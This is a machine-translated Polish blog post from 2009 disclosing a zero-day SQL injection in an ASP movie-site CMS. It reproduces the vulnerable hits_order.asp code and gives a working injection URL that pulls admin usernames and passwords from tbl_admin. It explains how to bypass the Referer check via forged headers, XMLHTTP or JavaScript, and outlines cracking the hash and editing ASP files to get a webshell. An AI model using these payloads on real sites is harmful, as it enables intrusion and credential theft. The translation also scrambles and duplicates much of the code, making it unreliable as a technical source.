Eye-dzień System Film 0day-0 dni, hits_order.asp, wtrysk, eye-dzień System film-st0p bloga

Eye-dniowe 0day systemu filmowe

Ten wpis został opublikowany dnia paź 25 2009

: St0p & My5t3ry
Reprodukowana, prosimy podać http://www.st0p.org source

Aha, i My5t3ry pochodzić z otworem, skontaktuj się z administratorem oficjalnej, nastąpiła żadna uwaga do mnie.

Po pierwsze, pozwól mi wstrzyknąć problem

Luka plik / p_inc / hits_order.asp

  <- # Include file = ".. / P_inc / config.asp" ->
 <- # Include file = ".. / P_inc / function.asp" ->
 <- # Include file = ".. / P_inc / function_func.asp" ->
 <- # Include file = ".. / P_inc / openconn.asp" ->
 <- # Include file = ".. / P_inc / G_function.asp" ->
 <%
 Then If Not ChkPost () Then
	 G_error_page_1 odpowiedź. Przekierowanie G_error_page_1
	 ( ) Koniec reakcji ()
 End If
 "Call ChkPost / p_inc / function.asp file () funkcja wykrywania adres źródłowy
 url,numb ) G_hitss funkcyjne (url, zdrętwiały)
	 Dim str
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "select top" i zdrętwiałe & "id, m_name, m_pic, m_hits, m_content z qingtiandy_movie gdzie m_look = 1 ORDER BY DESC, id m_hits DESC"
             "Widziałem to nie zdrętwiały, bez filtra
	 server . CreateObject ( G_RS ) Set rs = serwer. CreateObject (G_RS)
	 , 1 rs. open sql, conn, 1, 1
	 i = 1
	 Wykonaj Chociaż nie rs. Eof 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演：" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & "<div class=kkk1_list> <a class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. MoveNext
	 Pętla
	 G_hitss = str
 End Function
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (request (" url "), żądanie (" Numb "))%>")
 "Tu zdrętwiały filtr

Stosowanie metod, takich jak
1, można korzystać bezpośrednio z oprogramowaniem podrobionym Referer, odwiedź poniższy adres aby osiągnąć
Poprzez XMLHTTP wykuł Referer, odwiedź następującą realizację adres
3, przez JS JavaScript na kontrolowanie adres URL źródła

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. dokument zapisu (<a href='/p_inc/hits_order.asp?numb=1 str_username (select z tbl_admin) jako username,(select str_pass z tbl_admin) jako pass,'> science-fiction </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (wybierz str_username z tbl_admin) jako nazwę użytkownika, (str_pass wybierz z tbl_admin) jako przejścia,

Uwaga: aby przeskoczyć Referer wykrywania może być przez POST, GET, COOKIE z różnych sposobów osiągnięcia wstrzykiwać. . .

Dostęp do następujących, nazwa użytkownika administrator w adresie URL łącza, hash hasła wyświetlane bezpośrednio na zewnątrz. .

Złamać hash hasła, ponieważ tła mogą bezpośrednio edytować plik ASP, w tle i wziąć wiersz shell.

Procedura ta, są też inne luki. Tu nie jest. .